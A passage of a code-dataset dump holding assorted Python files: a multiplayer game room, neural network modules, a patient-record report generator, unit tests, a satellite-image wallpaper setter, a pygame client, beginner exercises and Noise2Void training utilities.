check_all_same_state(users, state):\n all_same = True\n for user in users:\n all_same = all_same and user.state == state\n return all_same\n\n @staticmethod\n def get_locations_dict(users):\n locations_dict = dict()\n for user in users:\n if user.state == State.QUARANTINED:\n continue\n if user.location in locations_dict:\n locations_dict[user.location].append(user)\n else:\n locations_dict[user.location] = [user]\n return locations_dict\n\n @staticmethod\n def get_votes_dict(users):\n votes_dict = dict()\n for user in users:\n if user.vote in votes_dict:\n votes_dict[user.vote].append(user)\n else:\n votes_dict[user.vote] = [user]\n return votes_dict\n\n @staticmethod\n def contains_infected(users_in_location):\n contains_infected = False\n for user in users_in_location:\n contains_infected = contains_infected or user.state == State.INFECTED\n return contains_infected\n","sub_path":"beer-app/cls_room.py","file_name":"cls_room.py","file_ext":"py","file_size_in_byte":6460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"634667276","text":"from catalyst import utils\nfrom catalyst.contrib.nn import ResidualBlock\nfrom torch import nn\nimport torchvision\n\n\nclass SequentialUnwrapper(nn.Module):\n def __init__(self, nn_module):\n super().__init__()\n self.nn_module = nn_module\n\n def forward(self, x):\n x_ = self.nn_module(x)\n return x, x_\n\n\ndef conv_block(in_channels, out_channels, pool=False):\n layers = [\n nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n ]\n if pool:\n layers.append(nn.MaxPool2d(2))\n return nn.Sequential(*layers)\n\n\ndef resnet9(in_channels: int, num_classes: int, size: int = 16):\n sz, sz2, sz4, sz8 = size, size * 2, size * 4, size * 8\n return nn.Sequential(\n conv_block(in_channels, sz),\n conv_block(sz, sz2, pool=True),\n ResidualBlock(nn.Sequential(conv_block(sz2, sz2), conv_block(sz2, sz2))),\n conv_block(sz2, sz4, pool=True),\n conv_block(sz4, sz8, pool=True),\n ResidualBlock(nn.Sequential(conv_block(sz8, sz8), conv_block(sz8, sz8))),\n nn.Sequential(\n nn.MaxPool2d(4),\n nn.Flatten(),\n nn.Dropout(0.2),\n SequentialUnwrapper(nn.Linear(sz8, num_classes)),\n ),\n )\n\n\nclass TemporalModel(nn.Module):\n def __init__(self, emb_features: int, out_features: int, dropout_p: float = 0.5):\n super().__init__()\n resnet = torchvision.models.resnet18(pretrained=True)\n in_features = resnet.fc.in_features\n resnet.fc = nn.Flatten()\n self.encoder = nn.Sequential(resnet, nn.Dropout(p=dropout_p))\n self.embedder = nn.Sequential(nn.Linear(in_features, emb_features), nn.ReLU())\n # self.attention = nn.Sequential(nn.Linear(in_features, 1), nn.Sigmoid())\n self.classifier = nn.Linear(emb_features, out_features)\n\n self.embedder.apply(utils.get_optimal_inner_init(nn.ReLU))\n self.classifier.apply(utils.outer_init)\n\n def forward(self, x):\n bs, ln, ch, h, w = x.shape\n x = self.encoder(x.view(-1, ch, h, w))\n embeddings = self.embedder(x.view(bs, ln, -1))\n # x_a = self.attention(x.view(bs, sl, -1))\n # x = x_r * x_a\n logits = self.classifier(embeddings).mean(1)\n return embeddings, logits\n","sub_path":"introspection/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"499904656","text":"def print_info(cursor, file_number, folders):\n import docx\n from datetime import date\n import helper_function.pccm_names as pccm_names\n import os.path\n module_name = [\"bio_info\", \"nut_supplements\", \"phys_act\", \"habits\", \"family_details\", \"med_history\", \"cancer_history\",\n \"family_cancer\", \"det_by\", \"breast_symptoms\"]\n folder = folders +'/Gen_Info_Docs'\n file_name = \"Folder_\" + (file_number.replace(\"/\", \"_\")) + \".docx\"\n path = os.path.join(folder, file_name)\n p_date_to_print = date.today().strftime('%d-%b-%Y')\n doc = docx.Document()\n doc.add_paragraph((\"File Number \" + file_number), style=\"Title\")\n doc.add_paragraph((\"Document Created on \" + p_date_to_print), style=\"Quote\")\n for index in range(0, len(module_name)):\n col_titles = pccm_names.names_info(module_name[index])\n columns = \", \".join(col_titles)\n sql = 'SELECT ' + columns + ' FROM Patient_Information_History WHERE File_number = \\'' + file_number + \"'\"\n data = cursor.execute(sql)\n data_file = data.fetchall()\n data_print = list(data_file[0])\n text_titles = pccm_names.info_print_all(module_name[index])\n for i in range(0, len(data_print)):\n p = doc.add_paragraph((text_titles[i] + \": \"), style=\"List Bullet\")\n (p.add_run(data_print[i])).bold = True\n doc.add_paragraph()\n doc.save(path)","sub_path":"add_edit/print_gen_info.py","file_name":"print_gen_info.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"143807437","text":"from time import sleep\nfrom unittest import TestCase\n\nfrom nose.tools import assert_raises, assert_equal\n\nfrom docker_conduct.core.app import App\nfrom docker_conduct.core.exceptions import AppInstallError\nfrom docker_conduct.entrypoints.conduct import Conduct\nfrom tests import TEST_REMOTE_URI_LOCAL_DIRECTORY\nfrom tests.helpers import remove_storage_dir, init_storage_dir\n\n__author__ = 'nick'\n\n\n\nclass ConductCommandTests(TestCase):\n\t\"\"\"Tests for the Conduct entrypoint commands\"\"\"\n\n\tapp_name = 'compose-project'\n\tapp_remote = TEST_REMOTE_URI_LOCAL_DIRECTORY\n\n\tdef setUp(self):\n\t\t\"\"\"Remove all installed apps\"\"\"\n\t\tinit_storage_dir()\n\t\tself.conduct = Conduct()\n\n\tdef tearDown(self):\n\t\tremove_storage_dir()\n\n\tdef test_install_local_directory(self):\n\t\t\"\"\"Test that a local directory remote can be installed\"\"\"\n\t\tself.conduct.main(['install', '--name', self.app_name, self.app_remote])\n\n\t\tapp = App.load_by_name(self.app_name)\n\n\t\tself.assertIsNotNone(app)\n\n\t\tself.assertEqual(app.name, self.app_name)\n\n\tdef test_already_retrieved(self):\n\t\t\"\"\"Tests that attempting to install an already installed app fails without deleting the app\"\"\"\n\n\t\t# Install new app\n\t\tself.test_install_local_directory()\n\n\t\twith assert_raises(AppInstallError):\n\t\t\tself.test_install_local_directory()\n\n\tdef test_run(self):\n\t\t\"\"\"Tests that an installed app can be run through docker-compose\"\"\"\n\t\tself.test_install_local_directory()\n\n\t\tself.conduct.main(['compose', self.app_name, 'up', '-d'])\n\n\t\tsleep(5)\n\n\t\tapp = App.load_by_name(self.app_name)\n\n\t\tassert_equal(app.status(), App.STATUS_RUNNING)\n\n\t\tself.conduct.main(['compose', self.app_name, 'stop'])\n\n\t\tassert_equal(app.status(), App.STATUS_OFF)","sub_path":"tests/entrypoint_tests/conduct_tests.py","file_name":"conduct_tests.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"537062124","text":"import requests\nimport os\nfrom bs4 import BeautifulSoup\nimport cv2\nfrom skimage import io\nimport ctypes\n\n# To do:\n# - Librarify.\n# - Install script\n\n# INSTRUCTIONS\n#\n# Use this at your own risk, I'm not responsible for any damages on your end.\n# I also don't intend to actively develop this, but might help in some situations.\n#\n# SCRIPT SETUP\n# Set destination location for image file below\n# Select desired image below\n# Select desired image resolution below\n#\n# AUTOMATIC WALLPAPER UPDATES\n# Open Task Scheduler (Windows search)\n# Create Task...\n# General Tab\n# \tGive name and description (not important, be creative)\n# \tChange User or Group -> Advanced\n#\t\tFind Now\n#\t\tFind and select your user account, then click OK (formatted as \"Username (email)\" sometimes)\n# \tRun only when user is logged on\n# Triggers\n#\tBegin the task: At log on\n#\tSpecific user: Yourself\n#\tRepeat task every: 10 minutes for a duration of: Indefinitely\n# Actions\n#\tAction: Start a program\n#\tProgram/script: python.exe (or pythonw.exe to run in background)\n#\t\tTo find exe folder, open Python, import sys, print(sys.executable)\n#\tAdd arguments: 'C:/Users///goes-east.py'\n\n# Destination for image. File is overwritten each time to save disk space.\nfile = 'C:/Users///earth.jpg'\n\n# Select an image by uncommenting it. Preview them here: https://www.star.nesdis.noaa.gov/GOES/GOES16_FullDisk.php\ntargetImage = 'GEOCOLOR'\t\t\t# True color daytime, multispectral IR at night\n#targetImage = 'EXTENT'\t\t\t\t# Geostationary Lightning Mapper\n#targetImage = 'AirMass'\t\t\t# RGB composite based on the data from IR and WV\n#targetImage = 'Sandwich'\t\t\t# Multi-spectral blend combines IR band 13 with visual band 3\n#targetImage = 'DMW'\t\t\t\t# Derived Motion Winds\n#targetImage = 'DayCloudPhase'\t\t# RGB used to evaluate the phase of cooling cloud tops\n#targetImage = 'NightMicrophysics'\t# RGB used to distinguish clouds from fog\n#targetImage = '01'\t\t\t\t\t# 0.47um Blue - Visible\n#targetImage = '02'\t\t\t\t\t# 0.64um Red - Visible\n#targetImage = '03'\t\t\t\t\t# 0.86um Veggie - Near IR\n#targetImage = '04'\t\t\t\t\t# 1.37um Cirrus - Near IR\n#targetImage = '05'\t\t\t\t\t# 1.6um Snow-Ice - Near IR\n#targetImage = '06'\t\t\t\t\t# 2.2um Cloud Particle - Near IR\n#targetImage = '07'\t\t\t\t\t# 3.9um Shortwave Window - IR\n#targetImage = '08'\t\t\t\t\t# 6.2um Upper-Level Water Vapor - IR\n#targetImage = '09'\t\t\t\t\t# 6.9um Mid-Level Water Vapor - IR\n#targetImage = '10'\t\t\t\t\t# 7.3um Lower-Level- Water Vapor - IR\n#targetImage = '11'\t\t\t\t\t# 8.4um Cloud Top - IR\n#targetImage = '12'\t\t\t\t\t# 9.6um Ozone - IR\n#targetImage = '13'\t\t\t\t\t# 10.3um Clean Longwave Window - IR\n#targetImage = '14'\t\t\t\t\t# 11.2um Longwave Window - IR\n#targetImage = '15'\t\t\t\t\t# 12.3um Dirty Longwave Window - IR\n#targetImage = '16'\t\t\t\t\t# 13.3um CO2 Longwave - IR\n\n# Select a resolution for your monitor. Recommend to pick one higher than your monitor's vertical resolution\n#targetResolution = '339x339.jpg'\n#targetResolution = '678x678.jpg'\ntargetResolution = '1808x1808.jpg'\n#targetResolution = '5424x5424.jpg'\n#targetResolution = '10848x10848.jpg'\n\ndef get_image_link():\n page = requests.get('https://www.star.nesdis.noaa.gov/GOES/GOES16_FullDisk.php')\n raw_html = page.content\n html = BeautifulSoup(raw_html, \"html5lib\")\n\n # all the image links have one of these classes\n links = html.select('a.FB,a.FBNZ')\n image_link = None\n\n for l in links:\n link_target = l.get_attribute_list('href')[0]\n if targetImage in link_target:\n # print(link_target)\n if (link_target.endswith(targetResolution)):\n image_link = link_target\n return image_link\n\n# taken from \"https://stackoverflow.com/questions/16694907/\"\n# \"how-to-download-large-file-in-python-with-requests-py\"\n\ndef download_file(url, file):\n # print(\"Downloading image from {}\".format(url))\n r = requests.get(url, stream=True)\n with open(file, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n # f.flush() # commented by recommendation from J.F.Sebastian\n return file\n\ndef is_valid_image(file):\n try:\n img = io.imread(file)\n except:\n return False\n return True\n\ndef setWallpaper():\n\t# Sets desktop wallpaper for Windows\n\tSPI_SET_WALLPAPER = 20\n\tctypes.windll.user32.SystemParametersInfoW(SPI_SET_WALLPAPER, 0, file, 0)\n\ndef fetch_and_set():\n\t# Get latest image\n\tos.remove(file)\n\tlink = get_image_link()\n\tdownload_file(link, file)\n\t\n\t# Add border to image - not really a fan since it makes the image smaller\n\t'''img = cv2.imread(file)\n\tassert is_valid_image(file)\n\theight = img.shape[0]\n\timg = cv2.copyMakeBorder(img, int(0.03 * height), 0, 0, 0, cv2.BORDER_CONSTANT)\n\tcv2.imwrite(file, img)'''\n\t\n\t# Set as desktop wallpaper\n\tsetWallpaper()\n\nfetch_and_set()","sub_path":"goes-east.py","file_name":"goes-east.py","file_ext":"py","file_size_in_byte":4854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"646124959","text":"from agent import Agent\nfrom ally import Ally\nimport globals\nimport random\n\nclass RandomAgent(Agent):\n def __init__(self, board, player):\n super(RandomAgent, self).__init__(board, player)\n\n def randomPlanning(self):\n playerHand = self.player.getHand()\n for _ in range(0, 6):\n if not playerHand or random.random() < 0.9:\n return\n card = random.choice(playerHand)\n if self.player.getResourcesBySphere(card.sphere) >= card.cost:\n self.player.spendResourcesBySphere(card.sphere, card.cost)\n self.player.addToAllies(card)\n\n def randomQuesting(self):\n combinedWillpower = 0\n playerCharacters = self.player.getAllCharacters()\n if not playerCharacters:\n return\n slen = random.randint(0, len(playerCharacters))\n if not slen:\n return\n for _ in range(slen):\n card = random.choice(playerCharacters)\n if not card.isTapped():\n combinedWillpower += card.getWillpower()\n card.tap()\n if self.player.checkIfAllTapped():\n break\n self.resolveQuesting(combinedWillpower)\n\n def randomDefense(self):\n enemiesEngaged = self.board.getEnemiesEngaged()\n if not enemiesEngaged:\n return\n for enemy in enemiesEngaged:\n defender = self.player.declareRandomDefender()\n if defender:\n result = defender.defense - enemy.attack\n if result < 0:\n defender.takeDamage(abs(result))\n else:\n self.player.randomUndefended(enemy.attack)\n\n def randomAttack(self):\n enemiesEngaged = self.board.getEnemiesEngaged()\n untappedCharacters = self.player.getUntappedCharacters()\n if not untappedCharacters or not enemiesEngaged:\n return\n slen = random.randint(0, len(untappedCharacters))\n if not slen:\n return\n playerCharacters = random.sample(untappedCharacters, k=slen)\n self.resolveAttack(playerCharacters, enemiesEngaged)\n","sub_path":"randomAgent.py","file_name":"randomAgent.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"544786488","text":"import pygame\nfrom network import Network\nfrom button import Button\n\nclass App:\n def __init__(self):\n print('init')\n self.btns = [Button(\"Rock\", 50, 500, (0, 0, 0)), Button(\"Scissors\", 250, 500, (255, 0, 0)), Button(\"Paper\", 450, 500, (0, 255, 0))]\n self.player = None\n self.game = None\n self.n = None\n self.width = 1280\n self.height = 720\n\n self.id = -1\n self.CAPTION = \"BINGO!\"\n self.SCREEN_RESOLUTION = (1280, 720)\n pygame.init()\n pygame.display.set_caption(self.CAPTION)\n self.screen = pygame.display.set_mode(self.SCREEN_RESOLUTION)\n self.GAME_STATE = 1\n self.STATE_WELCOME = 1\n self.STATE_PLAY = 2\n self.STATE_WINNER = 3\n self.count_player = 1\n self.run = True\n\n def start(self):\n print('start')\n while self.run:\n if self.GAME_STATE == self.STATE_WELCOME:\n self.handle_welcome()\n elif self.GAME_STATE == self.STATE_PLAY:\n self.handle_play()\n elif self.GAME_STATE == self.STATE_WINNER:\n self.handle_winner()\n pygame.quit()\n\n def handle_welcome(self):\n self.screen.fill((128, 128, 128))\n font = pygame.font.SysFont(\"comicsans\", 60)\n text = font.render(\"Klik untuk Mulai Bermain!\", 1, (255, 0, 0))\n self.screen.blit(text, (600, 400))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.run = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.GAME_STATE = self.STATE_PLAY\n self.handle_play()\n pygame.display.update()\n\n def handle_play(self):\n print('play')\n clock = pygame.time.Clock()\n clock.tick(60)\n self.n = Network()\n self.player = int(self.n.getP())\n while self.run:\n try:\n self.game = self.n.send(\"get\")\n except:\n self.run = False\n print(\"Couldn't get game\")\n break\n\n if self.game.bothWent():\n self.redrawWindow()\n pygame.time.delay(500)\n try:\n self.game = self.n.send(\"reset\")\n except:\n self.run = False\n print(\"Couldn't get game\")\n break\n\n font = pygame.font.SysFont(\"comicsans\", 90)\n if (self.game.winner() == 1 and self.player == 1) or (self.game.winner() == 0 and self.player == 0):\n text = font.render(\"You Won!\", 1, (255, 0, 0))\n elif self.game.winner() == -1:\n text = font.render(\"Tie Game!\", 1, (255, 0, 0))\n else:\n text = font.render(\"You Lost...\", 1, (255, 0, 0))\n\n self.screen.blit(text, (self.width / 2 - text.get_width() / 2, self.height / 2 - text.get_height() / 2))\n pygame.display.update()\n pygame.time.delay(2000)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.run = False\n pygame.quit()\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n for btn in self.btns:\n if btn.click(pos) and self.game.connected():\n if self.player == 0:\n if not self.game.p1Went:\n self.n.send(btn.text)\n else:\n if not self.game.p2Went:\n self.n.send(btn.text)\n\n self.redrawWindow()\n # self.screen.fill((128, 128, 128))\n # for event in pygame.event.get():\n # if event.type == pygame.QUIT:\n # self.run = False\n # if event.type == pygame.MOUSEBUTTONDOWN:\n # self.GAME_STATE = self.STATE_WELCOME\n # pygame.display.update()\n\n def handle_winner(self):\n pass\n\n def redrawWindow(self):\n self.screen.fill((128, 128, 128))\n\n if not (self.game.connected()):\n font = pygame.font.SysFont(\"comicsans\", 80)\n text = font.render(\"Waiting for Player...\", 1, (255, 0, 0), True)\n self.screen.blit(text, (self.width / 2 - text.get_width() / 2, self.height / 2 - text.get_height() / 2))\n else:\n font = pygame.font.SysFont(\"comicsans\", 60)\n text = font.render(\"Your Move\", 1, (0, 255, 255))\n self.screen.blit(text, (80, 200))\n\n text = font.render(\"Opponents\", 1, (0, 255, 255))\n self.screen.blit(text, (380, 200))\n\n move1 = self.game.get_player_move(0)\n move2 = self.game.get_player_move(1)\n if self.game.bothWent():\n text1 = font.render(move1, 1, (0, 0, 0))\n text2 = font.render(move2, 1, (0, 0, 0))\n else:\n if self.game.p1Went and self.player == 0:\n text1 = font.render(move1, 1, (0, 0, 0))\n elif self.game.p1Went:\n text1 = font.render(\"Locked In\", 1, (0, 0, 0))\n else:\n text1 = font.render(\"Waiting...\", 1, (0, 0, 0))\n\n if self.game.p2Went and self.player == 1:\n text2 = font.render(move2, 1, (0, 0, 0))\n elif self.game.p2Went:\n text2 = font.render(\"Locked In\", 1, (0, 0, 0))\n else:\n text2 = font.render(\"Waiting...\", 1, (0, 0, 0))\n\n if self.player == 1:\n self.screen.blit(text2, (100, 350))\n self.screen.blit(text1, (400, 350))\n else:\n self.screen.blit(text1, (100, 350))\n self.screen.blit(text2, (400, 350))\n\n for btn in self.btns:\n btn.draw(self.screen)\n\n pygame.display.update()\n\n\nif __name__ == \"__main__\":\n app = App()\n app.start()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"105842502","text":"SALARY_RAISE_FACTOR = 0.05\nSTATE_CODE_MAP = {\"NEWYORK\": \"NY\", \"Los Angeles\": \"LA\"}\n\ndef update_employee_record(rec):\n old_sal = rec[\"salary\"]\n new_sal = old_sal * (1 + SALARY_RAISE_FACTOR) \n rec[\"salary\"] = new_sal\n state_code = rec[\"state_code\"]\n rec[\"state_name\"] = STATE_CODE_MAP[state_code]\n\ninput_data = [\n {\"employee_name\" : \"Ryan\", \"salary\": 100000.0, state_code: \"LA\"},\n {\"employee_name\" : \"Apeach\", \"salary\": 44000.0, state_code: \"NT\"}\n]\n\nfor rec in input_data:\n update_employee_record(rec)\n name = rec[\"employee_name\"]\n salary = rec[\"salary\"]\n state = rec[\"state_name\"]\n print(name + 'now employee lives in' + state)\n print(' and make $' + str(salary))\n","sub_path":"first_script.py","file_name":"first_script.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"30602381","text":"def white_space_counting():\n\tsentence = input(\"give me a sentence!\")\n\tspace = 0\n\tfor n in sentence:\n\t\tif n == \" \":\n\t\t\tspace +=1\n\n\tprint(space)\n\ndef delete_white_space():\n\tsentence = input(\"give me a sentence!\")\n\tsentence_list = []\n\tsentence_without_space = \"\"\n\tfor n in sentence:\n\t\tif n == \" \":\n\t\t\tcontinue\n\t\telse:\n\t\t\tsentence_list.append(n)\n\tfor n in sentence_list:\n\t\tsentence_without_space += n\n\tprint(sentence_without_space)\n\t\t\n\ndef N_numbers():\n\tNumbers = []\n\tpair_number = 0\n\todd_number = 0\n\todd_sum = 0\n\tnumber_count = 0\n\twhile number_count < 10:\n\t\tNumber = int(input(\"give me a number!\"))\n\t\tNumbers.append(Number)\n\t\tnumber_count += 1\n\n\tfor n in Numbers:\n\t\t\n\t\t\tif n%2 == 0:\n\t\t\t\tpair_number +=1\n\t\t\telif n%2 == 1:\n\t\t\t\todd_number +=1\n\t\t\t\todd_sum += n\n\tprint(pair_number)\n\tprint(odd_number)\n\tprint(odd_sum)\n\ndef easter(date):\n\tT = date\n\tA = T%19\n\tB = T%4\n\tC = T%7\n\tD = (19*A +24)% 30\n\tE = (2*B + 4*C+6*D+5)%7\n\tH = 22 + D + E\n\tif H < 31:\n\t\tprint(\"A húsvét március\"+\" \" +str(H) + \".-án(-én) lesz\")\n\telse:\n\t\tprint(\"A húsvét április\"+\" \" +str(H-31) + \".-án(-én) lesz\")\n\ndef count_to_one_thousand():\n\tn_list = []\n\tfor n in range(1000):\n\t\tif n %5 == 0 and n%3 == 0:\n\t\t\tn_list.append(n)\n\tprint(n_list)\n\ndef print_words():\n\tsentence = input(\"give me a sentence\")\n\tword = \"\"\n\t\n\tfor l in range(len(sentence)):\n\t\tif sentence[l] == \"<\":\n\t\t\twhile sentence[l+1] != \">\":\n\t\t\t\tl += 1\n\t\t\t\tword += sentence[l]\n\t\t\tprint(word)\n\t\t\tword = \"\"\t\t\t\n\ndef lowest_number():\n\tnumbers = []\n\twhile len(numbers) < 10:\n\t\tnumber = int(input(\"give me a number\"))\n\t\tnumbers.append(number)\n\tlowest_N = 3454323\n\tbiggest_N = -3245434\n\tfor n in numbers:\n\t\tif n < lowest_N:\n\t\t\tlowest_N = n\n\t\tif n > biggest_N:\n\t\t\tbiggest_N =n\n\t\t\t\n\tprint(lowest_N)\n\tprint(biggest_N)\n\t\ndef pitagorasz(befogo_1,befogo_2,atfogo):\n\ta = befogo_1\n\tb = befogo_2\n\tc = atfogo\n\tif ((a*a) + (b*b)) == (c*c):\n\t\tprint(\"ez lehet derékszögű háromszög\")\n\telse:\n\t\tprint(\"ez nem lesz derékszögű háromszög\")\n\ndef pitagorasz_2_0(a,b,c):\n\tif ((a*a) + (b*b)) == (c*c):\n\t\tprint(\"ez lehet derékszögű háromszög\")\n\telif ((c*c) + (b*b)) == (a*a):\n\t\tprint(\"ez lehet derékszögű háromszög\")\n\telif ((c*c) + (a*a)) == (b*b):\n\t\tprint(\"ez lehet derékszögű háromszög\")\n\telse:\n\t\tprint(\"ez egyáltalán nem lesz háromszög\")\n","sub_path":"orientation_week/basic_exercieses/using_if.py","file_name":"using_if.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"431921295","text":"import os\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\nfrom noise_models.utils import image2tensor\r\n\r\n\r\n############################################\r\n# Training the network\r\n############################################\r\n\r\n\r\ndef stratified_coords_2d(num_pix, shape):\r\n '''\r\n Produce a list of approx. 'numPix' random coordinate, sampled from 'shape' using stratified sampling.\r\n '''\r\n box_size = np.round(np.sqrt(shape[0] * shape[1] / num_pix)).astype(np.int)\r\n coords = []\r\n box_count_y = int(np.ceil(shape[0] / box_size))\r\n box_count_x = int(np.ceil(shape[1] / box_size))\r\n for i in range(box_count_y):\r\n for j in range(box_count_x):\r\n y = np.random.randint(0, box_size)\r\n x = np.random.randint(0, box_size)\r\n y = int(i * box_size + y)\r\n x = int(j * box_size + x)\r\n if (y < shape[0] and x < shape[1]):\r\n coords.append((y, x))\r\n return coords\r\n\r\n\r\ndef random_crop_fri(data, size, num_pix, supervised=False, counter=None, augment=True):\r\n '''\r\n Crop a patch from the next image in the dataset.\r\n The patches are augmented by randomly deciding to mirror them and/or rotating them by multiples of 90 degrees.\r\n \r\n Parameters\r\n ----------\r\n data: numpy array\r\n your dataset, should be a stack of 2D images, i.e. a 3D numpy array\r\n size: int\r\n width and height of the patch\r\n num_pix: int\r\n The number of pixels that is to be manipulated/masked N2V style.\r\n dataClean(optional): numpy array\r\n This dataset could hold your target image e.g. clean images.\r\n If it is not provided the function will use the image from 'image' N2V style\r\n counter (optional): int\r\n the index of the next image to be used. \r\n If not set, a random image will be used.\r\n augment: bool\r\n should the patches be randomy flipped and rotated?\r\n \r\n Returns\r\n ----------\r\n img_out: numpy array\r\n Cropped patch from training image\r\n imgOutC: numpy array\r\n Cropped target patch. If dataClean was provided it is used as source.\r\n Otherwise its generated N2V style from the training set\r\n mask: numpy array\r\n An image holding marking which pixels should be used to calculate gradients (value 1) and which not (value 0)\r\n counter: int\r\n The updated counter parameter, it is increased by one.\r\n When the counter reaches the end of the dataset, it is reset to zero and the dataset is shuffled.\r\n '''\r\n\r\n if counter is None:\r\n index = np.random.randint(0, data.shape[0])\r\n else:\r\n if counter >= data.shape[0]:\r\n counter = 0\r\n np.random.shuffle(data)\r\n index = counter\r\n counter += 1\r\n\r\n if supervised:\r\n img = data[index, ..., 0]\r\n img_clean = data[index, ..., 1]\r\n manipulate = False\r\n else:\r\n img = data[index]\r\n img_clean = img\r\n manipulate = True\r\n\r\n img_out, img_out_c, mask = random_crop(img, size, num_pix,\r\n img_clean=img_clean,\r\n augment=augment,\r\n manipulate=manipulate)\r\n\r\n return img_out, img_out_c, mask, counter\r\n\r\n\r\ndef random_crop(img, size, num_pix, img_clean=None, augment=True, manipulate=True):\r\n '''\r\n Cuts out a random crop from an image.\r\n Manipulates pixels in the image (N2V style) and produces the corresponding mask of manipulated pixels.\r\n Patches are augmented by randomly deciding to mirror them and/or rotating them by multiples of 90 degrees.\r\n \r\n Parameters\r\n ----------\r\n img: numpy array\r\n your dataset, should be a 2D image\r\n size: int\r\n width and height of the patch\r\n num_pix: int\r\n The number of pixels that is to be manipulated/masked N2V style.\r\n img_clean (optional): numpy array\r\n This dataset could hold your target image e.g. clean images.\r\n If it is not provided the function will use the image from 'image' N2V style\r\n augment: bool\r\n should the patches be randomy flipped and rotated?\r\n \r\n Returns\r\n ---------- \r\n img_out: numpy array\r\n Cropped patch from training image with pixels manipulated N2V style.\r\n img_out_c: numpy array\r\n Cropped target patch. Pixels have not been manipulated.\r\n mask: numpy array\r\n An image marking which pixels have been manipulated (value 1) and which not (value 0).\r\n In N2V or PN2V only these pixels should be used to calculate gradients.\r\n '''\r\n\r\n assert img.shape[0] >= size\r\n assert img.shape[1] >= size\r\n\r\n x = np.random.randint(0, img.shape[1] - size)\r\n y = np.random.randint(0, img.shape[0] - size)\r\n\r\n img_out = img[y:y + size, x:x + size].copy()\r\n img_out_c = img_clean[y:y + size, x:x + size].copy()\r\n\r\n max_a = img_out.shape[1] - 1\r\n max_b = img_out.shape[0] - 1\r\n\r\n if manipulate:\r\n mask = np.zeros(img_out.shape)\r\n hot_pixels = stratified_coords_2d(num_pix, img_out.shape)\r\n for p in hot_pixels:\r\n a, b = p[1], p[0]\r\n\r\n roi_min_a = max(a - 2, 0)\r\n roi_max_a = min(a + 3, max_a)\r\n roi_min_b = max(b - 2, 0)\r\n roi_max_b = min(b + 3, max_b)\r\n roi = img_out[roi_min_b:roi_max_b, roi_min_a:roi_max_a]\r\n a_ = 2\r\n b_ = 2\r\n while a_ == 2 and b_ == 2:\r\n a_ = np.random.randint(0, roi.shape[1])\r\n b_ = np.random.randint(0, roi.shape[0])\r\n\r\n repl = roi[b_, a_]\r\n img_out[b, a] = repl\r\n mask[b, a] = 1.0\r\n else:\r\n mask = np.ones(img_out.shape)\r\n\r\n if augment:\r\n rot = np.random.randint(0, 4)\r\n img_out = np.array(np.rot90(img_out, rot))\r\n img_out_c = np.array(np.rot90(img_out_c, rot))\r\n mask = np.array(np.rot90(mask, rot))\r\n if np.random.choice((True, False)):\r\n img_out = np.array(np.flip(img_out))\r\n img_out_c = np.array(np.flip(img_out_c))\r\n mask = np.array(np.flip(mask))\r\n\r\n return img_out, img_out_c, mask\r\n\r\n\r\ndef training_pred(my_train_data, net, data_counter, size, bs, num_pix, noise_model, optimizer, augment=True,\r\n supervised=True):\r\n '''\r\n This function will assemble a minibatch and process it using the a network.\r\n \r\n Parameters\r\n ----------\r\n my_train_data: numpy array\r\n Your training dataset, should be a stack of 2D images, i.e. a 3D numpy array\r\n net: a pytorch model\r\n the network we want to use\r\n data_counter: int\r\n The index of the next image to be used. \r\n size: int\r\n Witdth and height of the training patches that are to be used.\r\n bs: int \r\n The batch patch_size.\r\n num_pix: int\r\n The number of pixels that is to be manipulated/masked N2V style.\r\n augment: bool\r\n should the patches be randomly flipped and rotated?\r\n Returns\r\n ----------\r\n samples: pytorch tensor\r\n The output of the network\r\n labels: pytorch tensor\r\n This is the tensor that was is used a target.\r\n It holds the raw unmanipulated patches.\r\n masks: pytorch tensor\r\n A tensor marking which pixels have been manipulated (value 1) and which not (value 0).\r\n In N2V or PN2V only these pixels should be used to calculate gradients.\r\n dataCounter: int\r\n The updated counter parameter, it is increased by one.\r\n When the counter reaches the end of the dataset, it is reset to zero and the dataset is shuffled.\r\n '''\r\n\r\n # Init Variables\r\n inputs = []\r\n labels = []\r\n masks = []\r\n\r\n # Assemble mini batch\r\n for j in range(bs):\r\n im, l, m, data_counter = random_crop_fri(my_train_data,\r\n size,\r\n num_pix,\r\n counter=data_counter,\r\n augment=augment,\r\n supervised=supervised)\r\n inputs.append(image2tensor(im))\r\n labels.append(image2tensor(l))\r\n masks.append(image2tensor(m))\r\n\r\n # Move to GPU\r\n inputs_raw, labels, masks = tf.stack(inputs)[..., tf.newaxis], tf.stack(labels), tf.stack(masks)[..., tf.newaxis]\r\n\r\n # Move normalization parameter to GPU\r\n std = tf.constant(net.std)\r\n mean = tf.constant(net.mean)\r\n\r\n model_inputs = tf.convert_to_tensor(inputs_raw - mean / std)\r\n # 